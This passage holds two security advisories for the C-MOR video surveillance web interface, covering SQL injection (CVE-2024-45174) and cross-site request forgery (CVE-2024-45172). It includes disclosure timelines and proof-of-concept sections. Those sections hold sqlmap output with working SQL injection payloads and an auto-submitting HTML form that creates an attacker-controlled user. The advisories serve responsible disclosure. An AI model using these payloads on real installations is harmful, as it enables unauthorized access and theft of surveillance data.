~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>

<pre><code>Advisory ID: SYSS-2024-023 Product: C-MOR Video Surveillance Manufacturer: za-internet GmbH Affected Version(s): 5.2401, 6.00PL01 Tested Version(s): 5.2401, 6.00PL01 Vulnerability Type: SQL Injection (CWE-89) Risk Level: High Solution Status: Open Manufacturer Notification: 2024-04-05 Solution Date: - Public Disclosure: 2024-09-04 CVE Reference: CVE-2024-45174 Authors of Advisory: Chris Beiter, Frederik Beimgraben, and Matthias Deeg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The software product C-MOR is an IP video surveillance system. The manufacturer describes the product as follows: "With C-MOR video surveillance, it is possible to check your surveillance over network and the Internet. You can access the live view as well as previous recordings from any PC or mobile device. C-MOR is managed and controlled over the C-MOR web interface. IP settings, camera recording setup, user rights and so on are set over the web without the installation of any software on the client."[1] Due to improper validation of user-supplied data, different functionalities of the C-MOR web interface are vulnerable to SQL injection attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: By analyzing the C-MOR web interface, it was found that different provided functionalities of the C-MOR web interface are vulnerable to SQL injection attacks. These kinds of attacks allow an authenticated user to execute arbitrary SQL commands in the context of the corresponding MySQL database. In the following pages, SQL injection vulnerabilities were found: * list-timelapse.plm (URL parameter: "cam") * list-motion.plm (URL parameter "cam") * show-movies.plm (URL parameter "cam") ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Using the software tool sqlmap[4], the SQL injection vulnerabilities via the URL parameter "cam" could be easily exploited, as the following output exemplarily illustrates: (...) sqlmap resumed the following injection point(s) from stored session: - --- Parameter: cam (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: days=1100&cam=cam1 AND (SELECT 2483 FROM(SELECT COUNT(*),CONCAT(0x717a707071,(SELECT (ELT(2483=2483,1))),0x717a707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: days=1100&cam=cam1 AND (SELECT 9790 FROM (SELECT(SLEEP(5)))Yfcf) - --- [17:16:12] [INFO] the back-end DBMS is MySQL [17:16:12] [INFO] fetching banner [17:16:12] [INFO] resumed: '5.1.66-0+squeeze1' web application technology: Apache back-end DBMS: MySQL >= 5.0 banner: '5.1.66-0+squeeze1' (...) By exploiting the SQL injection vulnerabilities, the MySQL database could be accessed and dumped as database user "cam". In version 6.00PL01, some SQL injection attack instances were fixed. However, others could still be found, for example via the URL parameter "c" on the page getpic.pml. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The described security vulnerability has not been fixed entirely in the newly released software version 6.00PL01. There is no fix for this security issue. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-05: Vulnerability reported to manufacturer 2024-04-05: Manufacturer acknowledges receipt of security advisories 2024-04-08: Exchange regarding security updates and disclosure timeline 2024-05-08: Further exchange concerning security updates and disclosure timeline; public release of all security advisories scheduled for release of C-MOR Video Surveillance version 6 2024-05-10: Release of C-MOR software version 5.30 with security updates for some reported security issues 2024-07-19: E-mail to manufacturer concerning release date of C-MOR Video Surveillance version 6; response with planned release date of 2024-08-01 2024-07-30: E-mail from manufacturer with further information concerning security fixes 2024-07-31: Release of C-MOR software version 6.00PL1 2024-09-04: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for C-MOR Video Surveillance https://www.c-mor.com/ [2] SySS Security Advisory SYSS-2024-023 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-023.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ [4] sqlmap GitHub repository https://github.com/sqlmapproject/sqlmap ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Chris Beiter, Frederik Beimgraben, and Matthias Deeg. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>

<pre><code>Advisory ID: SYSS-2024-022 Product: C-MOR Video Surveillance Manufacturer: za-internet GmbH Affected Version(s): 5.2401, 6.00PL01 Tested Version(s): 5.2401, 6.00PL01 Vulnerability Type: Cross-Site Request Forgery (CWE-352) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2024-04-05 Solution Date: - Public Disclosure: 2024-09-04 CVE Reference: CVE-2024-45172 Authors of Advisory: Chris Beiter, Frederik Beimgraben, and Matthias Deeg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The software product C-MOR is an IP video surveillance system. The manufacturer describes the product as follows: "With C-MOR video surveillance, it is possible to check your surveillance over network and the Internet. You can access the live view as well as previous recordings from any PC or mobile device. C-MOR is managed and controlled over the C-MOR web interface. IP settings, camera recording setup, user rights and so on are set over the web without the installation of any software on the client."[1] Due to missing protection mechanisms, the C-MOR web interface is vulnerable to cross-site request forgery (CSRF) attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The C-MOR web interface does not offer any protection against CSRF attacks. These kinds of attacks force end users respectively their web browsers to perform unwanted actions in a web application context in which they are currently authenticated. CSRF attacks specifically target state-changing requests, for example in order to enable or disable a feature, and not data theft, as an attacker usually has no possibility to see the response of the forged request. In general, CSRF attacks are conducted with the help of the victim, for example by a user visiting an attacker-controlled URL sent by e-mail in their web browser. Often, CSRF attacks make use of cross-site scripting attacks, but this is not mandatory. CSRF attacks can also be performed against a web application if a victim is only visiting an attacker-controlled web server. In this case, the attacker-controlled web server is used to generate a specially crafted HTTP request in the context of the user's web browser which is then sent to the vulnerable target web application. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following HTML file containing a web form generates a simple crafted HTTP POST request that creates a new user: <html> <body onload="document.forms[0].submit()"> <form action="https://<HOST>/dosetpassword.pml" method="POST"> <input type="hidden" name="user" value="attacker" /> <input type="hidden" name="user_fullname" value="Attacker" /> <input type="hidden" name="pw1" value="password" /> <input type="hidden" name="pw2" value="password" /> </form> </body> </html> When an authenticated C-MOR user with administrative privileges visits a web server hosting this HTML file, a new attacker-controlled user is created. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: There is no fix for this security issue. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-05: Vulnerability reported to manufacturer 2024-04-05: Manufacturer acknowledges receipt of security advisories 2024-04-08: Exchange regarding security updates and disclosure timeline 2024-05-08: Further exchange concerning security updates and disclosure timeline; public release of all security advisories scheduled for release of C-MOR Video Surveillance version 6 2024-05-10: Release of C-MOR software version 5.30 with security updates for some reported security issues 2024-07-19: E-mail to manufacturer concerning release date of C-MOR Video Surveillance version 6; response with planned release date of 2024-08-01 2024-07-30: E-mail from manufacturer with further information concerning security fixes 2024-07-31: Release of C-MOR software version 6.00PL1 2024-09-04: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for C-MOR Video Surveillance https://www.c-mor.com/ [2] SySS Security Advisory SYSS-2024-022 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-022.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Chris Beiter and Frederik Beimgraben. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en </code></pre>